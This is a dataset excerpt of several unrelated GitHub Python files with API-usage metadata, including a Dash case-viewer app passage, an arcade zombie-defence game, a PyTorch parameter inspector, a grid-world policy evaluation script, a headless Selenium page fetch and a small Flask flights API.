'n_intervals')],\n [Input('param_user', 'data')],\n [State('cases-tabs', 'children')]\n)\ndef append_tabs(user, cases_tabs):\n if user is None:\n raise dash.exceptions.PreventUpdate\n\n hoppers = CaseCalls().query_hopper(user)\n if len(hoppers)>0:\n cases_tabs.append(dbc.Tab(label='Hopper', tab_id='Hopper'))\n\n supervisees = CaseCalls().query_team(user)['SHORT_USER_NAME'].unique()\n if len(supervisees)>0:\n cases_tabs.append(dbc.Tab(label='Team', tab_id='Team'))\n\n return cases_tabs\n\n\n\n''' add Hopper tab when user has hoppers,\nadd Team tab when user has supervisees '''\n@app.callback(\n [Output('user-cases', 'data'), Output('hopper-cases', 'data'), Output('team-cases', 'data')],\n #[Input('clock-cases', 'n_intervals')],\n [Input('param_user', 'data')]\n)\ndef store(user):\n if user is None:\n raise dash.exceptions.PreventUpdate\n \n #user = request.cookies['user']\n cases = Cases(user)\n\n user_cases = cases.get_case_list()\n hopper_cases = cases.get_case_list('Hopper')\n team_cases = cases.get_case_list('Team')\n\n return CaseHandler().to_json(user_cases), CaseHandler().to_json(hopper_cases), CaseHandler().to_json(team_cases)\n\n\n''' pick data according to selected tab,\nshow table header first '''\n@app.callback(\n [Output('content-2-cases', 'children'), \n Output('table-data', 'children')],\n [Input('param_user', 'data'), \n Input('cases-tabs', 'active_tab'), \n Input('user-cases', 'data'), \n Input('hopper-cases', 'data'), \n Input('team-cases', 'data')]\n)\ndef index(user, selection, user_cases, hopper_cases, team_cases):\n if user is None: \n raise dash.exceptions.PreventUpdate\n\n cases = 
Cases(user)\n user_cases = pd.read_json(user_cases, orient='split')\n\n if selection == 'Current':\n ''' assume null system code is not closed case '''\n case_list = user_cases[user_cases['STATUS_SYSTEM_CODE'].fillna('')!='CLOSE'].reset_index(drop=True)\n #case_list = CaseHandler().security(case_list)\n return cases.table(columns), CaseHandler().to_json(case_list)\n \n elif selection == 'Lifetime':\n ''' not showing Last Modified cases in Lifetime '''\n case_list = user_cases[(user_cases['CREATED_BY_SAM'].str.lower()==user.lower()) | \n (user_cases['ASSIGNED_TO_SAM'].str.lower()==user.lower()) |\n (user_cases['OWNER_SAM'].str.lower()==user.lower())].reset_index(drop=True)\n #case_list = CaseHandler().security(case_list)\n return cases.table(columns), CaseHandler().to_json(case_list)\n\n elif selection == 'Hopper':\n #hopper_cases = pd.read_json(hopper_cases, orient='split')\n #hopper_cases = CaseHandler().security(hopper_cases)\n #return cases.table(columns), CaseHandler().to_json(hopper_cases)\n return cases.table(columns), hopper_cases\n\n elif selection == 'Team':\n #team_cases = pd.read_json(team_cases, orient='split')\n #team_cases = CaseHandler().security(team_cases)\n #return cases.table(columns), CaseHandler().to_json(team_cases)\n return cases.table(columns), team_cases\n\n elif selection == 'Relationships':\n return 'Relationships', None\n\n\n''' \nfilter table,\nand according to filtered table data adjusting graphs '''\n@app.callback(\n [Output('content-1-cases', 'children'), \n Output('filtered-data', 'children')],\n [Input('param_user', 'data'),\n Input('cases-tabs', 'active_tab'), \n Input('table-data', 'children'), \n Input({'type': 'filter', 'colname': ALL}, 'value'), \n Input({'type': 'filter', 'colname': ALL}, 'id')]\n)\ndef filter(user, selection, data, filter_values, filter_ids):\n if user is None: \n raise dash.exceptions.PreventUpdate\n if data is None:\n return dbc.Col('No Data Available!'), None\n \n data = pd.read_json(data, orient='split')\n data = sdt.filter_table(data, filter_values, filter_ids, url_col=['Case Title']) \n \n cases = Cases(user)\n \n if selection == 'Current':\n #should look like cases.current(*args,**kwargs)\n return cases.current(data), data.to_json(orient='split')\n \n elif selection == 'Lifetime':\n #should look like cases.lifetime(*args,**kwargs)\n return cases.lifetime(data), data.to_json(orient='split')\n\n elif selection == 'Hopper':\n #should look like cases.hopper(*args,**kwargs)\n return cases.hopper(data), data.to_json(orient='split')\n\n elif selection == 'Team':\n #should look like cases.hopper(*args,**kwargs)\n return cases.team(data), data.to_json(orient='split')\n\n elif selection == 'Relationships':\n #should look like cases.relationships(*args,**kwargs)\n return 'Relationships'\n\n\n''' \nclick on column names to sort table\nodd number of times: ascending, even number of times: descending \n\nwhen table data is too big, only show the first 1000 rows\n'''\n@app.callback(\n [Output('table-body', 'children'), \n Output('download-link-table', 'href'), \n Output('previous-header-clicks', 'children')],\n [Input('filtered-data', 'children'), \n Input({'type': 'header', 'colname': ALL}, 'n_clicks'), \n Input({'type': 'header', 'colname': ALL}, 'id')],\n [State('previous-header-clicks', 'children')]\n)\ndef sort(data, header_clicks, header_ids, previous_header_clicks):\n if data is None: \n raise dash.exceptions.PreventUpdate \n\n data = pd.read_json(data, orient='split')\n \n ''' only show \"security\" cases '''\n ''' cases will not 
show in tables, but will count into statistic graphs'''\n data = CaseHandler().security(data)\n \n data['Case Title'] = data.apply(lambda row: [row['Case Title'], row['Case URL']], axis=1)\n data = data[columns]\n data = data.sort_values(['Case Type', 'Case ID'], ascending=[True, False]).reset_index(drop=True)\n data = sdt.sort_table(data, header_clicks, header_ids, previous_header_clicks, url_col=['Case Title'])\n\n download_csv = 'data:text/csv;charset=utf-8,' + urllib.parse.quote(data.to_csv(index=False, encoding='utf-8'))\n return sdt.generate_table_body(data.head(1000), url_col=['Case Title']), download_csv, header_clicks", "repo_name": "boxer-xian/Stemmons-Person-Viewer", "sub_path": "tabs/Cases.py", "file_name": "Cases.py", "file_ext": "py", "file_size_in_byte": 8269, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "dash_bootstrap_components.Tabs", "line_number": 22, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Tab", "line_number": 24, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Tab", "line_number": 25, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 42, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Spinner", "line_number": 44, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 45, "usage_type": "call"}, {"api_name": "dash_core_components.Store", "line_number": 48, "usage_type": "call"}, {"api_name": "dash_core_components.Store", "line_number": 49, "usage_type": "call"}, {"api_name": "dash_core_components.Store", "line_number": 50, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 53, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 54, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 55, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 56, "usage_type": "call"}, {"api_name": "dash.exceptions", "line_number": 73, "usage_type": "attribute"}, {"api_name": "db.CaseCalls.CaseCalls", "line_number": 75, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Tab", "line_number": 77, "usage_type": "call"}, {"api_name": "db.CaseCalls.CaseCalls", "line_number": 79, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Tab", "line_number": 81, "usage_type": "call"}, {"api_name": "app.app.callback", "line_number": 65, "usage_type": "call"}, {"api_name": "app.app", "line_number": 65, "usage_type": "name"}, {"api_name": "dash.dependencies.Output", "line_number": 66, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 68, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 69, "usage_type": "call"}, {"api_name": "dash.exceptions", "line_number": 96, "usage_type": "attribute"}, {"api_name": "bases.CasesDiv.Cases", "line_number": 99, "usage_type": "call"}, {"api_name": "handler.CaseHandler.CaseHandler", "line_number": 105, "usage_type": "call"}, {"api_name": "app.app.callback", "line_number": 89, "usage_type": "call"}, {"api_name": "app.app", "line_number": 89, "usage_type": "name"}, {"api_name": "dash.dependencies.Output", "line_number": 90, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 92, "usage_type": "call"}, {"api_name": "dash.exceptions", "line_number": 121, "usage_type": "attribute"}, {"api_name": "bases.CasesDiv.Cases", "line_number": 123, "usage_type": "call"}, {"api_name": 
"pandas.read_json", "line_number": 124, "usage_type": "call"}, {"api_name": "handler.CaseHandler.CaseHandler", "line_number": 130, "usage_type": "call"}, {"api_name": "handler.CaseHandler.CaseHandler", "line_number": 138, "usage_type": "call"}, {"api_name": "app.app.callback", "line_number": 110, "usage_type": "call"}, {"api_name": "app.app", "line_number": 110, "usage_type": "name"}, {"api_name": "dash.dependencies.Output", "line_number": 111, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 112, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 113, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 114, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 115, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 116, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 117, "usage_type": "call"}, {"api_name": "dash.exceptions", "line_number": 170, "usage_type": "attribute"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 172, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 174, "usage_type": "call"}, {"api_name": "stemmons_dash_table.filter_table", "line_number": 175, "usage_type": "call"}, {"api_name": "bases.CasesDiv.Cases", "line_number": 177, "usage_type": "call"}, {"api_name": "app.app.callback", "line_number": 159, "usage_type": "call"}, {"api_name": "app.app", "line_number": 159, "usage_type": "name"}, {"api_name": "dash.dependencies.Output", "line_number": 160, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 161, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 162, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 163, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 164, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 165, "usage_type": "call"}, {"api_name": "dash.dependencies.ALL", "line_number": 165, "usage_type": "name"}, {"api_name": "dash.dependencies.Input", "line_number": 166, "usage_type": "call"}, {"api_name": "dash.dependencies.ALL", "line_number": 166, "usage_type": "name"}, {"api_name": "dash.exceptions", "line_number": 217, "usage_type": "attribute"}, {"api_name": "pandas.read_json", "line_number": 219, "usage_type": "call"}, {"api_name": "handler.CaseHandler.CaseHandler", "line_number": 223, "usage_type": "call"}, {"api_name": "stemmons_dash_table.sort_table", "line_number": 228, "usage_type": "call"}, {"api_name": "urllib.parse.quote", "line_number": 230, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 230, "usage_type": "attribute"}, {"api_name": "stemmons_dash_table.generate_table_body", "line_number": 231, "usage_type": "call"}, {"api_name": "app.app.callback", "line_number": 206, "usage_type": "call"}, {"api_name": "app.app", "line_number": 206, "usage_type": "name"}, {"api_name": "dash.dependencies.Output", "line_number": 207, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 208, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 209, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 210, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 211, "usage_type": "call"}, {"api_name": "dash.dependencies.ALL", "line_number": 211, "usage_type": "name"}, {"api_name": "dash.dependencies.Input", 
"line_number": 212, "usage_type": "call"}, {"api_name": "dash.dependencies.ALL", "line_number": 212, "usage_type": "name"}, {"api_name": "dash.dependencies.State", "line_number": 213, "usage_type": "call"}]}
+{"seq_id": "38883154344", "text": "import arcade\nimport random\nimport math\nimport settings\n\n\nWIDTH = 800\nHEIGHT = 600\nMOVEMENT_SPEED = [-2, -3, -4, -5]\n\n\nclass Chapter3View(arcade.View):\n def __init__(self):\n super().__init__()\n global bullet_speed, background, images\n self.finish = False\n\n # Sprite Images\n background_image = 'Chapter 3 Sprites/background.jpg'\n player_image = 'Chapter 3 Sprites/player.png'\n gun_image = 'Chapter 3 Sprites/gun.png'\n enemy_image = 'Chapter 3 Sprites/zombie.png'\n\n images = [background_image, player_image, gun_image, enemy_image]\n\n background = arcade.Sprite(images[0],\n center_x=WIDTH/2,\n center_y=HEIGHT/2,\n scale=1)\n\n arcade.set_background_color(arcade.color.BLACK)\n self.total_time = 31.0\n\n self.player = arcade.Sprite(images[1],\n center_x=WIDTH/2,\n center_y=0,\n scale=0.18)\n\n self.base = arcade.Sprite(center_x=WIDTH/2, center_y=-375, scale=1)\n base_color = arcade.color.BATTLESHIP_GREY\n self.base.texture = arcade.make_soft_square_texture(WIDTH,\n base_color,\n outer_alpha=255)\n\n self.gun = arcade.Sprite(images[2],\n center_x=WIDTH/2,\n center_y=-15,\n scale=0.13)\n\n self.mouse = arcade.Sprite(center_x=100, center_y=100)\n self.mouse.texture = arcade.make_soft_circle_texture(10,\n arcade.color.RED,\n outer_alpha=10)\n\n self.enemies = arcade.SpriteList()\n\n self.bullets = arcade.SpriteList()\n bullet_speed = 50\n\n def on_draw(self):\n arcade.start_render()\n\n background.draw()\n self.enemies.draw()\n self.bullets.draw()\n self.base.draw()\n self.gun.draw()\n self.player.draw()\n self.mouse.draw()\n\n minutes = int(self.total_time) // 60\n seconds = int(self.total_time) % 60\n\n # Texts\n pause_display = \"Press ESC To Pause\"\n timer = f\"Time: {minutes:02d}:{seconds:02d}\"\n timer_ends = \"Mission Complete\"\n goal = \"Defend The Base\"\n end_msg = \"Click Enter to Advance\"\n\n messages = [pause_display, timer, timer_ends, goal, end_msg]\n\n arcade.draw_text(messages[0],\n 600,\n HEIGHT-40,\n arcade.color.WHITE,\n 15)\n\n if seconds == 0:\n self.finish = True\n\n if self.finish is False:\n arcade.draw_text(messages[1],\n 10,\n HEIGHT-40,\n arcade.color.WHITE,\n 30)\n else:\n arcade.draw_text(messages[2],\n 10,\n HEIGHT-40,\n arcade.color.WHITE,\n 30)\n if seconds >= 28 and seconds <= 31:\n arcade.draw_text(messages[3],\n WIDTH/2-160,\n HEIGHT-100,\n arcade.color.WHITE,\n 30)\n if self.finish is True:\n arcade.draw_text(messages[4],\n WIDTH/2-190,\n 100,\n arcade.color.WHITE,\n 30)\n\n def update(self, delta_time):\n self.bullets.update()\n self.enemies.update()\n self.gun.update()\n self.spawn_enemy()\n self.collision()\n\n if self.finish is False:\n self.total_time -= delta_time\n\n def spawn_enemy(self):\n global images\n if self.finish is False:\n if random.randrange(40) == 0:\n enemy = arcade.Sprite(images[3], scale=0.3)\n enemy.center_x = random.randrange(50, WIDTH-50)\n enemy.center_y = random.randrange(HEIGHT+50, HEIGHT*2)\n enemy.change_y = random.choice(MOVEMENT_SPEED)\n self.enemies.append(enemy)\n\n def collision(self):\n for enemy in self.enemies:\n bullets_in_contact = enemy.collides_with_list(self.bullets)\n if bullets_in_contact:\n enemy.kill()\n for bullet in bullets_in_contact:\n bullet.kill()\n\n for enemy in self.enemies:\n base_in_contact = self.base.collides_with_list(self.enemies)\n if base_in_contact:\n enemy.kill()\n gameover = GameoverView(self)\n self.window.show_view(gameover)\n\n def on_mouse_motion(self, x, y, delta_x, delta_y):\n self.mouse.center_x = x\n self.mouse.center_y = y\n\n # 
Allow gun to follow the direction of mouse\n self.gun.height = 300\n x_diff = x - self.gun.center_x\n y_diff = y - self.gun.center_y\n angle = math.atan2(y_diff, x_diff)\n self.gun.angle = math.degrees(angle)\n\n def on_mouse_press(self, x, y, button, key_modifiers):\n global bullet_speed\n bullet = arcade.Sprite('Chapter 3 Sprites/bullet.png', scale=0.02)\n bullet.center_x = WIDTH/2\n bullet.center_y = -10\n\n # Bullet facing at an angle\n x_diff = x - bullet.center_x\n y_diff = y - bullet.center_y\n angle = math.atan2(y_diff, x_diff)\n\n bullet.angle = math.degrees(angle)\n bullet.change_x = math.cos(angle) * bullet_speed\n bullet.change_y = math.sin(angle) * bullet_speed\n self.bullets.append(bullet)\n\n def on_key_press(self, key, _modifiers):\n if self.finish is True:\n if key == arcade.key.ENTER:\n self.director.next_view()\n if key == arcade.key.ESCAPE:\n pause = PauseView(self)\n self.window.show_view(pause)\n\n\nclass PauseView(arcade.View):\n def __init__(self, game_view):\n super().__init__()\n self.game_view = game_view\n\n def on_show(self):\n arcade.set_background_color(arcade.color.ORANGE)\n\n def on_draw(self):\n arcade.draw_text(\"PAUSED\", WIDTH/2, HEIGHT/2+50,\n arcade.color.WHITE, font_size=50, anchor_x=\"center\")\n\n arcade.draw_text(\"Press Esc. to return\",\n WIDTH/2,\n HEIGHT/2,\n arcade.color.WHITE,\n font_size=20,\n anchor_x=\"center\")\n arcade.draw_text(\"Press Enter to reset\",\n WIDTH/2,\n HEIGHT/2-30,\n arcade.color.WHITE,\n font_size=20,\n anchor_x=\"center\")\n\n def on_key_press(self, key, _modifiers):\n if key == arcade.key.ESCAPE:\n self.window.show_view(self.game_view)\n elif key == arcade.key.ENTER:\n game = Chapter3View()\n self.window.show_view(game)\n\n\nclass GameoverView(arcade.View):\n def __init__(self, game_view):\n super().__init__()\n self.game_view = game_view\n\n def on_show(self):\n arcade.set_background_color(arcade.color.ORANGE)\n\n def on_draw(self):\n arcade.draw_text(\"Game Over\", WIDTH/2, HEIGHT/2+50,\n arcade.color.RED, font_size=50, anchor_x=\"center\")\n\n arcade.draw_text(\"Press Enter to Try Again\",\n WIDTH/2,\n HEIGHT/2-30,\n arcade.color.RED,\n font_size=20,\n anchor_x=\"center\")\n\n def on_key_press(self, key, _modifiers):\n if key == arcade.key.ENTER:\n game = Chapter3View()\n self.window.show_view(game)\n\n\nif __name__ == \"__main__\":\n \"\"\"This section of code will allow you to run your View\n independently from the main.py file and its Director.\n You can ignore this whole section. 
Keep it at the bottom\n of your code.\n It is advised you do not modify it unless you really know\n what you are doing.\n \"\"\"\n from utils import FakeDirector\n window = arcade.Window(settings.WIDTH, settings.HEIGHT)\n my_view = Chapter3View()\n my_view.director = FakeDirector(close_on_next_view=True)\n window.show_view(my_view)\n arcade.run()\n", "repo_name": "ICS3U-Gallo/cpt-2019-harvardbtw", "sub_path": "chapter_3.py", "file_name": "chapter_3.py", "file_ext": "py", "file_size_in_byte": 8683, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "arcade.View", "line_number": 12, "usage_type": "attribute"}, {"api_name": "arcade.Sprite", "line_number": 26, "usage_type": "call"}, {"api_name": "arcade.set_background_color", "line_number": 31, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 31, "usage_type": "attribute"}, {"api_name": "arcade.Sprite", "line_number": 34, "usage_type": "call"}, {"api_name": "arcade.Sprite", "line_number": 39, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 40, "usage_type": "attribute"}, {"api_name": "arcade.make_soft_square_texture", "line_number": 41, "usage_type": "call"}, {"api_name": "arcade.Sprite", "line_number": 45, "usage_type": "call"}, {"api_name": "arcade.Sprite", "line_number": 50, "usage_type": "call"}, {"api_name": "arcade.make_soft_circle_texture", "line_number": 51, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 52, "usage_type": "attribute"}, {"api_name": "arcade.SpriteList", "line_number": 55, "usage_type": "call"}, {"api_name": "arcade.SpriteList", "line_number": 57, "usage_type": "call"}, {"api_name": "arcade.start_render", "line_number": 61, "usage_type": "call"}, {"api_name": "arcade.draw_text", "line_number": 83, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 86, "usage_type": "attribute"}, {"api_name": "arcade.draw_text", "line_number": 93, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 96, "usage_type": "attribute"}, {"api_name": "arcade.draw_text", "line_number": 99, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 102, "usage_type": "attribute"}, {"api_name": "arcade.draw_text", "line_number": 105, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 108, "usage_type": "attribute"}, {"api_name": "arcade.draw_text", "line_number": 111, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 114, "usage_type": "attribute"}, {"api_name": "random.randrange", "line_number": 130, "usage_type": "call"}, {"api_name": "arcade.Sprite", "line_number": 131, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 132, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 133, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 134, "usage_type": "call"}, {"api_name": "math.atan2", "line_number": 160, "usage_type": "call"}, {"api_name": "math.degrees", "line_number": 161, "usage_type": "call"}, {"api_name": "arcade.Sprite", "line_number": 165, "usage_type": "call"}, {"api_name": "math.atan2", "line_number": 172, "usage_type": "call"}, {"api_name": "math.degrees", "line_number": 174, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 175, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 176, "usage_type": "call"}, {"api_name": "arcade.key", "line_number": 181, "usage_type": "attribute"}, {"api_name": "arcade.key", "line_number": 183, "usage_type": 
"attribute"}, {"api_name": "arcade.View", "line_number": 188, "usage_type": "attribute"}, {"api_name": "arcade.set_background_color", "line_number": 194, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 194, "usage_type": "attribute"}, {"api_name": "arcade.draw_text", "line_number": 197, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 198, "usage_type": "attribute"}, {"api_name": "arcade.draw_text", "line_number": 200, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 203, "usage_type": "attribute"}, {"api_name": "arcade.draw_text", "line_number": 206, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 209, "usage_type": "attribute"}, {"api_name": "arcade.key", "line_number": 214, "usage_type": "attribute"}, {"api_name": "arcade.key", "line_number": 216, "usage_type": "attribute"}, {"api_name": "arcade.View", "line_number": 221, "usage_type": "attribute"}, {"api_name": "arcade.set_background_color", "line_number": 227, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 227, "usage_type": "attribute"}, {"api_name": "arcade.draw_text", "line_number": 230, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 231, "usage_type": "attribute"}, {"api_name": "arcade.draw_text", "line_number": 233, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 236, "usage_type": "attribute"}, {"api_name": "arcade.key", "line_number": 241, "usage_type": "attribute"}, {"api_name": "arcade.Window", "line_number": 255, "usage_type": "call"}, {"api_name": "settings.WIDTH", "line_number": 255, "usage_type": "attribute"}, {"api_name": "settings.HEIGHT", "line_number": 255, "usage_type": "attribute"}, {"api_name": "utils.FakeDirector", "line_number": 257, "usage_type": "call"}, {"api_name": "arcade.run", "line_number": 259, "usage_type": "call"}]}
+{"seq_id": "41924847723", "text": "# -*- coding: utf-8 -*-\n\nimport torch\nimport torchvision.models as models\nfrom torchsummary import summary\nimport model.model as model\ndevice =torch.device(\"cuda:1\")\n#device=torch.device(\"cpu\")\nnet = model.choose_net(\"nested_unet\")\nnet = net(in_channel=3,out_channel=1)\nload = \"./check_point/nested_unetbatch4scale512.0epoch30.pth\"\nnet.load_state_dict(\n #torch.load(load,map_location=device)\n torch.load(load)\n\n)\n#net.to(device)\nindata=torch.FloatTensor(3,512,512)\n\n#summary(net,(3,512,512))\npara={}\nfor name,parameters in net.named_parameters():\n print(name,\":\",parameters.size())\n para[name]=parameters.detach().numpy()\nprint(para)\n\n", "repo_name": "Eggwardhan/Segmentation-of-colon-tumor-cells-based-on-pathological-images", "sub_path": "check_model.py", "file_name": "check_model.py", "file_ext": "py", "file_size_in_byte": 647, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.device", "line_number": 7, "usage_type": "call"}, {"api_name": "model.model.choose_net", "line_number": 9, "usage_type": "call"}, {"api_name": "model.model", "line_number": 9, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 18, "usage_type": "call"}]}
+{"seq_id": "15711709629", "text": "#!/usr/bin/env python\n\n# Greg Attra\n# 02/12/2022\n\n# Driver class for running policy evaluation in the grid world problem\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom lib.dynamic_programming.grid_world.grid_world import N_STATES, gw_dynamics, Action\nfrom lib.dynamic_programming.policy_iteration import policy_evaluation\n\n\ndef main():\n policy = np.ones((N_STATES, len(Action))) / float(len(Action))\n dynamics = gw_dynamics()\n values = policy_evaluation(policy, dynamics, N_STATES, len(Action)).reshape(\n int(np.sqrt(N_STATES)),\n int(np.sqrt(N_STATES)))\n \n plt.matshow(values)\n for (i, j), z in np.ndenumerate(values):\n plt.text(j, i, '{:0.1f}'.format(z), ha='center', va='center',\n bbox=dict(boxstyle='round', facecolor='white', edgecolor='0.3'))\n\n plt.gca().invert_yaxis()\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "gbattra/deep-rl", "sub_path": "code/src/grid_world/run_policy_evaluation.py", "file_name": "run_policy_evaluation.py", "file_ext": "py", "file_size_in_byte": 914, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.ones", "line_number": 16, "usage_type": "call"}, {"api_name": "lib.dynamic_programming.grid_world.grid_world.N_STATES", "line_number": 16, "usage_type": "name"}, {"api_name": "lib.dynamic_programming.grid_world.grid_world.Action", "line_number": 16, "usage_type": "argument"}, {"api_name": "lib.dynamic_programming.grid_world.grid_world.gw_dynamics", "line_number": 17, "usage_type": "call"}, {"api_name": "lib.dynamic_programming.policy_iteration.policy_evaluation", "line_number": 18, "usage_type": "call"}, {"api_name": "lib.dynamic_programming.grid_world.grid_world.N_STATES", "line_number": 18, "usage_type": "argument"}, {"api_name": "lib.dynamic_programming.grid_world.grid_world.Action", "line_number": 18, "usage_type": "argument"}, {"api_name": "numpy.sqrt", "line_number": 19, "usage_type": "call"}, {"api_name": "lib.dynamic_programming.grid_world.grid_world.N_STATES", "line_number": 19, "usage_type": "argument"}, {"api_name": "numpy.sqrt", "line_number": 20, "usage_type": "call"}, {"api_name": "lib.dynamic_programming.grid_world.grid_world.N_STATES", "line_number": 20, "usage_type": "argument"}, {"api_name": "matplotlib.pyplot.matshow", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "numpy.ndenumerate", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.text", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}]}
+{"seq_id": "31868062061", "text": "from selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\n\nchrome_service = Service(ChromeDriverManager().install())\n\nchrome_options = Options()\noptions = [\n \"--headless\",\n \"--disable-gpu\",\n \"--window-size=1920,1200\",\n \"--ignore-certificate-errors\",\n \"--disable-extensions\",\n \"--no-sandbox\",\n \"--disable-dev-shm-usage\"\n]\nfor option in options:\n chrome_options.add_argument(option)\n\ndriver = webdriver.Chrome(service=chrome_service, options=chrome_options)\ndriver.get(\"https://vulms.vu.edu.pk/LMS_LP.aspx\")\n\ncaptcha_text = driver.find_element(By.ID, \"g-recaptcha-response\")\nprint(captcha_text.get_attribute('value'))", "repo_name": "Anon-Exploiter/selenium-actions-test", "sub_path": "action.py", "file_name": "action.py", "file_ext": "py", "file_size_in_byte": 821, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "selenium.webdriver.chrome.service.Service", "line_number": 7, "usage_type": "call"}, {"api_name": "webdriver_manager.chrome.ChromeDriverManager", "line_number": 7, "usage_type": "call"}, {"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 9, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 22, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 22, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 25, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 25, "usage_type": "name"}]}
+{"seq_id": "19404778269", "text": "from flask import Flask, json, abort\r\nimport csv\r\n\r\napp = Flask(__name__)\r\n\r\n\r\n@app.route('/')\r\n@app.route('/index')\r\ndef index():\r\n    return 'Example URL to create query: 127.0.0.1:5000/flights/2 '\r\n\r\n\r\n@app.route('/flights/<flight_id>', methods=['GET'])\r\ndef flights(flight_id):\r\n    with open('flights.csv') as file:\r\n        file_reader = csv.reader(file)\r\n        for row in file_reader:\r\n            if row[0] == flight_id:\r\n                data = {\r\n                    'ArrivalTime': row[6],\r\n                    'DepartureTime': row[4],\r\n                    'Number': row[7]\r\n                }\r\n                return json.dumps(data)\r\n    abort(404)\r\n\r\n\r\nif __name__ == '__main__':\r\n    app.run()\r\n", "repo_name": "LitovaLi/Web", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 721, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "flask.Flask", "line_number": 4, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.json.dumps", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.json", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 25, "usage_type": "call"}]}
